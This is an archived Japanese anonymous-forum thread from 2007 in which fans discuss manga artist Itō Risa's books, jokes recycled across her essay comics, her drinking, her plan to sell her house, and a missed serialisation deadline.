ハウスクリーニングが後ろめたい、とかもかぶってるよね…。
担当の編集者は既出ネタをチェックしないのか。

140 :花と名無しさん:2007/01/15(月) 21:33:54 ID:???0
いや、文句は言っていいんじゃない?
むしろ言うべきというか。
作者がオドオドして言うべき事を言わない漫画だからと言って
それを好きなこちらが遠慮するのは根本が違うと思う
あちらはそれも計算のうちなのだから

141 :花と名無しさん:2007/01/15(月) 22:20:25 ID:???0
>>140
「おんなの窓」を買ったけど、巻末のゲストの寄稿を見て
作者が表現する「伊藤理佐」と、他人からみた「伊藤理佐」がずいぶん違うなと思った。

安野モヨコ:ダイエットの断食をしてるのに「すぐ挫折する」「モヨたんには無理」と電話で言う
山本直樹:登山中の毒舌トーク
吉田戦車:バーで長野出身のマスターとスケート対決の話になり、「勝ちますよ」宣言

「紹興酒に携帯沈めた」事件とあわせたら、周囲からは微DQNと見られてないだろうか。
三人とも、ちょっと本気で作者の「迷惑・非常識」をあげているように感じた。

142 :花と名無しさん:2007/01/15(月) 23:57:12 ID:???0
というか、この人本当にお酒飲むの止めた方がいいと思う。
色々な意味で。

143 :花と名無しさん:2007/01/16(火) 00:18:42 ID:???0
小説家もエッセイに書いたネタを
小説に書いたらネタかぶりって言われるのかな。
小説家のスレとか見ないからわからんのだけど。
せめて一年でも寝かせてくれたらいいんだけどなぁ。

酒に関しては、はちのこの時も思ったな。
頭がボコボコになるまで殴りあうって…

144 :花と名無しさん:2007/01/16(火) 00:49:06 ID:???0
今月出た単行本の印税合計が幾らかは知らんが
家のローンを払い終わるまでは酒で仕事・友達を失うような事は
しないで欲しい・・・心配だ。

145 :花と名無しさん:2007/01/16(火) 00:51:43 ID:???0
ローンはたしか終わったはず
フラウかなにかで言ってたよ

146 :花と名無しさん:2007/01/16(火) 01:38:17 ID:???0
家族全員で理佐たんの本を読んでいるんだが、以前弟が
「伊藤理佐って見てる分には良いんだけどお近づきにはなりたくないタイプだよな」
と言ってて、最初はよくわからんかった
…が、最近はハチの子の話といいちょっとそう思うようになった
自身のためにも酒を控えて欲しいなあと思ってしまう…

147 :花と名無しさん:2007/01/16(火) 02:18:04 ID:???0
多分、ピータンから伊藤理佐を読み始めたら、きっとまぬけだけどいい人〜って印象が先に来るんだと思う。

微熱なバナナとか、他の漫画から入ったら、まあこんなもんだろうと思う。


気がする。
平成よっぱらい研究所にも載ってたが、まあ微妙にアレだった

148 :花と名無しさん:2007/01/16(火) 02:48:29 ID:???0
だがそこがいい。
と、私は思うんだけど。
ていうか、作品はほどよく毒が効いてて面白いほうが
いいけど、本人はふつーに害のないいい人でいてほしい、なんて
ずうずうしい願い?だと思う。
法を犯さない程度のエキセントリックぶりがあるほうが漫画家(作家)らしくていいよ。
まわりのみんなにある程度好感もたれてないと仕事しずらいOLとかじゃないんだから。
そういや本人、エッセイで「数少ない友達」とかいってた気がしたけど、
ちがったっけ。

149 :花と名無しさん:2007/01/16(火) 03:44:55 ID:???0
>>148
でも現実の友達に3人とも非常識行動を指摘されてるのは
なんだかなーと思った。

150 :花と名無しさん:2007/01/16(火) 07:22:38 ID:???0
>>143
小説家の書くエッセイとギャグ漫画家のそれとじゃ、
スタンスが全然違うからねえ
同じ土俵で語る事は不可能

151 :花と名無しさん:2007/01/16(火) 07:58:41 ID:???0
伊藤理佐って元々「ダラでバカでダメ人間な私」ってスタンスだと思ってたよ。
微妙にっつうか、結構なドキュ話満載だしw
そういうスタンスの作家の本に寄稿するのに
「私だけが知っている理佐タンの素敵エピソード☆」みたいの書いても
営業妨害だと思うがw
ドキュが過ぎて理佐タンに友達がいなくなろうがどうでもいいよ。
面白い漫画さえ描いてくれりゃ。

152 :花と名無しさん:2007/01/16(火) 08:58:24 ID:???0
5冊同時云々は、出版社サイドが読み間違えたんだろうな
読者はそこまでバカじゃないぞ、とw

153 :花と名無しさん:2007/01/16(火) 10:52:13 ID:???O
個人的には創作もの(?)漫画とエッセイ漫画のネタ被りは
あーコレはアレのネタ元だなって感じでまだゆるせるが
(ファンサービス?舞台裏を見たくないって考え方もあるけど。)
エッセイ漫画同士のネタ被りは正直萎えるね。
「自分名義で家建てた女は三年以内で死ぬby細木数子」、
「看護婦さんに若いおばあちゃんと言われ、
母に変なブローチ着けてるからと怒られる」
「ダスキンのひと、独身なのにごめんなさい。」
とかは、そっくりそのまま同じだしなぁ。コピーかと思った。

まあでもおんなの窓は面白かったし買ってよかった。


154 :花と名無しさん:2007/01/16(火) 13:44:10 ID:???0
同じネタでも、表現やオチを変えてあればいいと思う。

それにしてもみんな真面目だな〜。
ギャグ漫画の人がちょっとドキュソだからとひくものなの?
おそらく「おんなの窓」の友人達も本人も、多少の誇張をして
面白くさせてるところもあると思うし。
もともと普通からちょっとはみ出してるような人だから漫画家に
なったんだろうから。もっとドキュでもぜんぜんかまわないよ。

155 :花と名無しさん:2007/01/16(火) 13:50:12 ID:???0
好きで読んだものの、ちょっと自分の倫理観から外れるところがあった
結果、娯楽とモラルの間で葛藤が生じたが、頭が悪いのでうまく昇華できない
そこで人格攻撃することで、さしあたりの葛藤を解消

ってところじゃないの




156 :花と名無しさん:2007/01/16(火) 14:17:50 ID:???0
>155
なかなかいいこというね!
でもさ、倫理観のあり方について刺激される作品てどれだろ?
大森さんの冷蔵庫? モヨコへの悪魔のセリフ?
たしかに大森さんは「こまけえ男だな」と思うけど、モヨコとの
やりとりはすごく仲が良いからこそのもので、逆にほほ笑ましいけどな。
あと、山本直樹の「窓」もどんだけ辛口な毒はいてるのかなんて伏字だからわからないし、
そもそも山本直樹の毒といったらたぶん伊藤理佐どころじゃないだろう。
じぶんの体重60キロを隠さずに対人関係において小学生ぶりをまき散らす
伊藤理佐は、おもしろいよ。もっとやれ。

157 :花と名無しさん:2007/01/16(火) 14:29:08 ID:???0

> でもさ、倫理観のあり方について刺激される作品てどれだろ?

それは、人それぞれでしょ

白線以外は海!な小学生の一コマに、
危ない遊びを描いてる交通安全意識に欠けた漫画家ってつっかかる人も
この世にはいるかもわからんしw



158 :花と名無しさん:2007/01/16(火) 14:57:30 ID:???0
おんなの窓、楽天で予約までしたのにまだこねぇよ。
もうイラネ。

159 :花と名無しさん:2007/01/16(火) 15:41:53 ID:???0
文字を書いてるときの「ろりろり」て擬音がなんか好き

160 :花と名無しさん:2007/01/16(火) 17:04:11 ID:???0
ネタ被りだけは許せない。限度っつうもんがあるだろ!
みんな優しいなあ…

161 :花と名無しさん:2007/01/16(火) 18:58:35 ID:???0
>>145
ヌゲーもうローン終わってるのか・・・
やっちまったよ〜で組んだローンって65歳位まで払う予定だったような?
うろ覚えだが。
じゃあ、もうそれほどあくせく働かなくていいんだ・・・

162 :花と名無しさん:2007/01/16(火) 20:39:03 ID:???0
理佐タンの働きぶりなら、年間で1000万近く返済できるだろうしね。

163 :花と名無しさん:2007/01/16(火) 20:47:41 ID:???0
私なんか75歳までローン設定してあるだよ!

164 :花と名無しさん:2007/01/17(水) 02:24:30 ID:???0
うちも70歳くらいまでじゃなかったっけかな…。
月々の返済額は低め設定なので、さっさとまとめて
返したほうがいいんだけど、中古マンションなので
「ここに一生住みたくないのに、数百万とか今いっぺんに
返すのがもったいない…」とかせこいことを考えちゃって。
理佐たんのようにがつーんと返したいよorz

165 :花と名無しさん:2007/01/17(水) 08:09:26 ID:???O
マユ父のおつまみ変遷、お菓子のところに
ルモンドとあるけどルマンドだと思う。
ブルボンのだよね。

166 :花と名無しさん:2007/01/17(水) 08:59:19 ID:???0
自分もローンあるので、重複ネタ大量投下の単行本を購入するのにかなり抵抗あり。
りさたんがローン返済終わったならなおさらw
まあ、ブクオフまちかなー。
朝子さんが出れば即買いする。

167 :花と名無しさん:2007/01/17(水) 09:33:10 ID:???0
おんなの窓、高杉。わたしもブクオフ待ちです

168 :花と名無しさん:2007/01/17(水) 09:56:36 ID:???0
チューネン娘。もこの前ブクオフで100均になっていたし
おんなの窓やひげぴよは、のんびり待つ事にします

169 :花と名無しさん:2007/01/17(水) 12:17:52 ID:???0
そういえばコーヒーゼリイはコーヒーゼリーに直ってたな。

170 :花と名無しさん:2007/01/18(木) 00:10:35 ID:???O
最初の2ページのネタ被りよりもその後10ページの自分自身との被り具合のぶっとびに全てを許せたって感じだ。
文句言いたい人はどんどん言えば〜ってところかなあ。

171 :花と名無しさん:2007/01/18(木) 06:32:02 ID:???0
あんだけ多作だからちょっとくらいのカブりは別に…という感じだ。
いろんなエピソードも、私にはたいしてドキュとも思えない。
多分自分の方がドキュだから。伊藤さんには友達だっているから、そんな
非常識な人じゃないと思うよ。
ただ働き過ぎだよね、外に出られず忙しすぎて
60キロは女として…ちょっと(たしか身長は160なくなかったか?)。

172 :花と名無しさん:2007/01/18(木) 08:36:46 ID:???0
153くらいだっけか

173 :花と名無しさん:2007/01/18(木) 09:30:28 ID:???0
尿酸値が上がりそうだな

174 :花と名無しさん:2007/01/18(木) 09:50:32 ID:???0
158センチだそう。一戸建て本によれば。
もともと顔が細身の人は、油断しやすいからね

175 :花と名無しさん:2007/01/18(木) 09:51:07 ID:???0
153で60`はいかちいな、と去年飲みすぎで155で60`までいった私が言ってみる。
飲む量減らしたら勝手に痩せるよ。ガンガレ理佐たん。

176 :花と名無しさん:2007/01/18(木) 10:04:31 ID:???0
いかちいってどんな?

177 :花と名無しさん:2007/01/18(木) 11:57:59 ID:???0
「いかつい」の頭の悪い言い方が「いかちい」

178 :花と名無しさん:2007/01/18(木) 13:18:23 ID:???0
よく、餃子を皮から!ってエピソードがあるけど、
普通、少し気合入れるときって餃子を皮から作るもんなんですか・・・・。

179 :花と名無しさん:2007/01/18(木) 13:48:10 ID:???0
自作はもちもちちしておいしいんだよー


180 :花と名無しさん:2007/01/18(木) 13:59:34 ID:???0
作り慣れてる人はそんなに負担でもないみたい<皮から作る餃子
パリ感を求める焼き餃子は機械の薄い皮の方が好きだな

181 :花と名無しさん:2007/01/19(金) 00:06:04 ID:???0
双葉社webマガジン 更新されてます。

182 :花と名無しさん:2007/01/19(金) 01:00:52 ID:???0
ピータンの9巻、道に迷った40歳女性の
しわっぽい描写にリアルを感じた。
というか、理佐たんも近いうち40代に突入するわけですが、
そのとき、同世代女性を描くときにあの描写ができるのだろうか、と
思ったりして。

183 :花と名無しさん:2007/01/19(金) 07:10:10 ID:???0
仙台広瀬通りのTSUTAYAが24時間営業で本も売るようになったので
のぞいてきたけど、伊藤さんの本、1冊も置いてない。
ダメ本屋だな、こりゃ

184 :花と名無しさん:2007/01/19(金) 12:07:53 ID:???0
>>181
乙です
早速見に行ったけどまた微妙に見づらくなってる
いったんWeb上にあげたら保存されるのは仕方ないんだから
割り切って最初の形式に戻してくれないかな…


185 :花と名無しさん:2007/01/19(金) 12:15:10 ID:???0
181ですが、見づらさはパソの性能しだいではないかと思われます。
こちらは問題なく見えており、逆に以前より見やすいです。


186 :花と名無しさん:2007/01/19(金) 12:26:39 ID:???0
ユーザー側の環境を限定するのは
本来だったらネチケット大違反の行為なんだけどね
そういう意味でpdf形式だったのは正しかったんだよ>185
双葉社にモラルを説いても仕方ないかw

187 :花と名無しさん:2007/01/19(金) 12:39:12 ID:???0
ああ、そうかもね。(私は185です)
今の形式になってからは私のmacでは読めなくなりました。
しょーがないんでwinで読み出したんですが、きれいだったものでつい書いてしまいました。
失礼しました。

188 :花と名無しさん:2007/01/19(金) 12:41:02 ID:???0
184ですが改行し忘れたせいで
181さんに文句言ってるみたいになってしまって、申し訳なかったです
雰囲気悪くしてしまってすみませんでした

189 :花と名無しさん:2007/01/19(金) 14:13:39 ID:???0
>>182
それ、思う。
朝子さんくらいの、「これからどうなるのかなどうしようかな」を
ずっと書いてたもんね。ちんこまんこ以外では。


「こうなるから心配しないの」で、「こうなった」人たちを
どこまで描けるのかなーなんて思ったり。



190 :花と名無しさん:2007/01/19(金) 15:07:42 ID:???0
こんなの見つけたけどピータンネタかな?

400 :おさかなくわえた名無しさん :2007/01/18(木) 21:37:53 ID:7PhG5kfd
うちの近所にくる石焼いも屋は、

いーしや〜きいも〜…
おいもっ

おいしーいおいもだよ?

さーあ、いらっしゃーい

っていうよ。
でも全然スピード落とさないから
走っても追い付けなくていつも買えないんだ

191 :花と名無しさん:2007/01/19(金) 15:19:48 ID:???0
あの、背中を向けたときの間がすきだな


192 :花と名無しさん:2007/01/19(金) 17:38:03 ID:???0
>190
うちの近所に来る焼き芋屋さんもそういうよ。
さらに「早くしないといっちゃうよ?」とも最後に言うし。

ピータンネタとは限らない。

193 :花と名無しさん:2007/01/19(金) 18:05:04 ID:???0
チューネン娘で30が若いのか若くないのか・・・って話で
「思ったより違ってた部分はあるけど、30は若くは無いだろ・・・」と思ったけど
作者が40になったら、40代のキャラの心境が
「40って思ったより若いのか若くないのか・・・」みたいになるのかなあ。

194 :花と名無しさん:2007/01/19(金) 18:57:21 ID:???O
最寄り駅近くの書店、発売日の夜行ったら作者五十音順の「い」のところが何冊か抜けてて、
あー買った人いたんだなあと勝手に想像してた

195 :花と名無しさん:2007/01/19(金) 20:35:23 ID:???0
そうだねー、「近道しようとして迷った40歳女性」の描き方はシビアだ。
2,3年くらい前に理佐たんが自分と同年代の34歳くらいの女性を
描いた姿は、しわもクマも描写されておらず「まだ(一応)若い」感じだったけれど
40歳になった女性にはキビシイんだな、と思ったw
しかし、たぶん自身が40代に突入したら
>>193みたいな感じで「自分としてはまだ若いんだけど…」と戸惑いながらも
同年代の女性の顔にしわは描けないと思う。



196 :195:2007/01/19(金) 20:37:47 ID:???0
すいません、リロードしたら182さんが先に同じような
こと書いてた。

197 :花と名無しさん:2007/01/20(土) 13:08:43 ID:???0
おんなの窓って部数少なかったのかな
尼で売り切れてマーケットプレイスでプレ値販売されててビクリ

198 :花と名無しさん:2007/01/20(土) 16:54:47 ID:???0
うん。書店でも同時発売した他の本はあるのに窓はない。

199 :花と名無しさん:2007/01/21(日) 12:41:33 ID:???0
>>197
でも尼は、本屋さんでは平積みになってる本が「在庫なし」とか、
よくあるから(例:細川さんの「ツレがうつになりまして。」とか)。
「尼の在庫状況=流通してるか否か」と思ってる人も多いらしいけど
それは違うことも多い

200 :花と名無しさん:2007/01/21(日) 12:48:04 ID:???0
増刷かけたタミングとかもあるんじゃないの?

201 :花と名無しさん:2007/01/21(日) 15:13:17 ID:???0
うちのほうは大きめの本屋でも在庫なかったよ
まあそのうち増刷かかるだろう

202 :花と名無しさん:2007/01/21(日) 18:17:59 ID:???0
東京駅構内の本屋には昨日あったよ。
漫画コーナーじゃなくサブカル本の方。

203 :花と名無しさん:2007/01/21(日) 18:54:56 ID:???0
そうそう サブカルのコーナーというか
文芸扱いだから、マンガコーナーにはないよ。
芸能・TV関連本が置いてあるところにあったよ。

204 :花と名無しさん:2007/01/22(月) 18:53:58 ID:???O
コミックエッセイっていうんだっけ?この手のになると本屋で探しにくい。大田垣晴子とか。



205 :花と名無しさん:2007/01/22(月) 19:08:45 ID:???0
おんなの窓は書籍扱いだから違う場所にあった。
たとえばサイバラりえこの「ああ息子」の近くとか。

206 :花と名無しさん:2007/01/22(月) 22:06:56 ID:???0
妙齢おねえさん道読んだ????????

1戸建てには今は住んでいなくて、賃貸暮らしで
1戸建ては売る予定・・・みたいなことが書いてあったよ!


・・・・なんかちょっとショックだ・・・・なんで売るんだろ。
家が大きすぎたのかな。 飽きたのかな。

207 :花と名無しさん:2007/01/22(月) 22:16:08 ID:???0
イブニングでりさっち先生を発見。
「○○○ん」になってたそうです。

208 :花と名無しさん:2007/01/22(月) 22:29:07 ID:???0
>206
読んでないから知らないけどそんな内容なの?!

しかし、一人用一軒家吹き抜けトイレつきは売れるのかな?
家族には狭いだろうし、子供が独立した夫婦も将来を考えると
3階建てとかの階段が多い家は避けそうだし…。

209 :花と名無しさん:2007/01/22(月) 22:31:15 ID:???0
300万円の本棚は?

210 :206:2007/01/22(月) 22:41:34 ID:???0
ネタバレになるから詳しくは書かないけど、
家関連のコマは2〜3コマだったよ。
さーっと流し読みしたら気づかなかったかも。

明日発売のイブニングのさくらんネタを理佐タンが書いてるらしいね。

さくらん細見体験版 伊藤理佐

211 :206:2007/01/22(月) 22:43:20 ID:???0
本棚ネタは書いてありませんでしたー

212 :花と名無しさん:2007/01/22(月) 22:46:11 ID:???0
また家建てたくなったのかな 今度はもっと大きいの
それか結婚?

213 :花と名無しさん:2007/01/23(火) 00:10:38 ID:???0
もしかして、前に漫画に書いてた「引越しをせずには居られない人」なのだろうか。

214 :花と名無しさん:2007/01/23(火) 03:45:10 ID:???0
一戸建てたてた途端、また家建てたい、とか
書いてたよね、そのせいか? あるいは賞を取って有名になって
家も特定されやすいのでストーカー被害とか?
ねこらも一緒に賃貸暮らしか〜、どうしよう、いま
六本木ヒルズとかに住んでたら。

215 :花と名無しさん:2007/01/23(火) 07:41:37 ID:???0
ヒルズだったら作品とすごいギャップあるなぁ・・・。

216 :花と名無しさん:2007/01/23(火) 13:34:02 ID:???0
イブニング見た

さくらんにエキストラとして参加したけど、
結局映っているのかいないのか
本人チェックでは映ってなかったぽいけど

217 :花と名無しさん:2007/01/23(火) 14:14:52 ID:???0
結婚するのかな・・・一戸建て売却て・・・

218 :花と名無しさん:2007/01/23(火) 15:05:24 ID:???0
賞で金持ち→家グレードアップ?

219 :花と名無しさん:2007/01/23(火) 15:12:31 ID:???0
イブニング立ち読みした。私の勘違いだったらスマソだが
目次見て「伊藤理佐」の名前をパパッと探したのだが見当たらず
最初からページをばーーーっとめくって発見。
んでまた最後によくよく目次見たら理佐タンの名前が
あるべき所に違う人の名前があった、気がした。これって誤植?
私の見間違いかな。目次探してもないからご報告まで。

220 :花と名無しさん:2007/01/23(火) 16:51:07 ID:???0
やっちまったな一戸建て

221 :花と名無しさん:2007/01/23(火) 17:07:01 ID:???0
寝室に猫を入れないために鍵をつけた頃から彼氏でもいたんじゃないかと。

222 :花と名無しさん:2007/01/23(火) 20:14:12 ID:???0
>>219
目次の名まえが違うのは、前号が香成という人だったので
今回もそのまんま使って間違えたような感じです。

223 :花と名無しさん:2007/01/24(水) 04:47:01 ID:???0
売っちまったよ一戸建て

224 :花と名無しさん:2007/01/24(水) 10:57:22 ID:???O
近くの書店に女道しか売ってなかった
しかも千円だから買うのをためらった

昨日アンケート調査の人が来て図書券千円分くれる
とのことで一時間弱のアンケートしたよ

今から女道かいにゆきます
なんでピータン置いてないのかな

225 :花と名無しさん:2007/01/24(水) 15:46:05 ID:???0
ああ、一戸建て売るんだ…
なんとなーくだけど、りさたんへの温度がすこーし下がった。なぜかしら??

少し仕事を絞って、ネタかぶりなしの作品をだしてくださいね。

226 :花と名無しさん:2007/01/24(水) 16:04:53 ID:???0
結婚するのかなあ?
もしくは、ご近所トラブルとか、ストーカーとか、
泥棒入ったとか、そういう嫌な事件があって
住みたくなくなったとか。
それなら納得。

理佐たんの場合、「なんとなく」とか「もう一軒建てたい」でも
結構納得するけど、今現在賃貸なんだよね。

227 :花と名無しさん:2007/01/24(水) 16:14:49 ID:???0
暇な噂好き婆が席巻


228 :花と名無しさん:2007/01/24(水) 16:59:19 ID:???0
>225
私も、なんか温度が少しだけ下がった。
なんでだろ?
実はセレブなりさたんの姿に距離を感じて
さびしいのだろうか・・
ってか、なんで一戸建てを売る、というエピソードでそれを
感じるのだろうか、自分がヘン。

229 :花と名無しさん:2007/01/24(水) 17:48:02 ID:???O
一戸建てに出てきた星さん松本先生、
犬シャツさんが良かったし
あの一戸建てはお一人様の理佐たんの
象徴だと思ってたから
10年足らずで手放すなんてさみしいよ。

230 :花と名無しさん:2007/01/24(水) 17:48:29 ID:???0
>>228
> なんでだろ?

「金ない男いないダメな私」な等身大漫画の「自分と同じ」感が
読む動機だった下層なひとが、それが思い違いだったってことを知っただけでしょ
こないだ人格攻撃に摩り替えてにぎわってたときと同じ。



231 :花と名無しさん:2007/01/24(水) 19:08:42 ID:???O
>230

人を下層とか言うのも、品がないような。


232 :花と名無しさん:2007/01/24(水) 19:14:56 ID:???0
建てた家に幽霊が出たんじゃないだろうかw

233 :花と名無しさん:2007/01/24(水) 19:41:41 ID:???0
KISSスレに今回のピータン休載ってかきこみが。
家は手放す、休載、いったいどうしたんだ?

234 :花と名無しさん:2007/01/24(水) 19:45:42 ID:???0
>>231
図星に必死w

235 :花と名無しさん:2007/01/24(水) 19:48:10 ID:???0
まぁここであれこれ言っても、本人が公表しない限り
正確なことはわからないんだから。

236 :花と名無しさん:2007/01/24(水) 20:07:36 ID:???0
目に見えるものにしか興味がもてないような人たちは
そういうことにあれこれいうのが娯楽なのです。

237 :花と名無しさん:2007/01/24(水) 20:10:33 ID:???0
>>233
早売り読んだ者だけど、休載っていうか原稿落としたみたい。
怪我でも病気でもなく単に原稿落としただけだと説明されていた。
個人的な感想としては「やな感じ」の書き方に思えた。

238 :花と名無しさん:2007/01/24(水) 20:23:01 ID:???0
>>233
休載の言い訳とピータンの四コマネタが2ページだけ掲載。
(書き下ろしか再録かは最近コミックでしか読んでないから分からない)
伊藤さんの言い訳は個人的に蛇足と思った。

それにしてもピータン新刊もちょっと絵が雑っぽくなっててガッカリした。
伊藤さんの絵って手抜きっぽく見えて実はそうでない所が好きだったのに、ところどころ殴り書きみたい。
ネタも何気にイラっとするものが増えてた。

239 :花と名無しさん:2007/01/24(水) 20:33:25 ID:???0
煽りではないんだけど
娯楽であるマンガを読んでイラっとするなら読まないほうがいいのでは?
最初は楽しかったのに、途中から合わなくなるのはよくあることだろう。
私も読んでいてイラつくマンガは精神衛生に良くないので以後読まない


240 :239:2007/01/24(水) 20:35:00 ID:???0
↑書き忘れ
まぁ、私はまだリサタンのマンガ面白いと思うから読むけどな。

241 :花と名無しさん:2007/01/24(水) 21:20:09 ID:???0
今回の単行本一気売り出しと、一戸建て売り出し&ピータン休載お知らせ

全部リンクしてるよねえ
何があったんだろう…

242 :花と名無しさん:2007/01/24(水) 21:36:33 ID:???0
なんとなく、猫が死んだのかなと思った。

243 :花と名無しさん:2007/01/24(水) 21:48:00 ID:???0
>>238
私もここ最近あれ?ってちょっと感じる時がある
連載増えてから特に(ネタかぶりは別に気にしてない)

ちょっとセーブすればいいのになって思うよ
今回の休載みたいな羽目にもなるし
でもさすがにイラっとするようになったら私はもう読まないなw

244 :花と名無しさん:2007/01/24(水) 22:36:42 ID:???0
おいクロタンって、単行本やカラーのおまけではなく
雑誌の連載作品としてみた時に、あのレベルでいいんだろうか?
と、今回の4コマがクロタンぽい感じだったので思ったりした。
ワンモアキスは暇があれば立ち読み、程度なのだけど…

セーブすればいいのにって意見に同感。

54 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)